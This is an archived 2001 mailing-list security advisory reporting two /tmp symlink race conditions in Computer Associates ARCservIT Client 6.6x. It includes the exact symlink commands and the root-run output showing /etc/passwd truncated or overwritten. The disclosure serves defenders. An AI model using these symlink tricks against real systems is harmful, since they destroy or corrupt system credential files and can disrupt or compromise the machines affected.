OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jonas Eriksson (jesekure.net)
Date: Fri May 18 2001 - 04:10:31 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    Computer Associates ARCservIT Client version 6.6x has atleast two /tmp
    races, as following:

    Vulnerability #1
    -----------------

    This tmp-race only works if the asagent client never been executed
    before.

    As user:

    jeboxname~> ln -s /etc/passwd /tmp/asagent.tmp

    And root:

    rootboxname# /usr/CYEagent/asagent start
    CA Universal Agent ADV v1.39 started on openview SunOS 5.8
    Generic_108528-07 sun4u

    ARCserveIT Universal Agent started...

    Then,

    jeboxname~> ls -la /etc/passwd
    -r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd

    Vulnerability #2
    -----------------

    As user:

    jeboxname~> ln -s /etc/passwd /tmp/inetd.tmp

    And root:

    rootboxname# /usr/CYEagent/asagent inet add

    Then,

    jeboxname~> cat /etc/passwd
    asagentd 6051/tcp # ARCserve agent
    asagentd 6051/udp # ARCserve agent

    Computer Associates has been informed.

    Regards
    Jonas Eriksson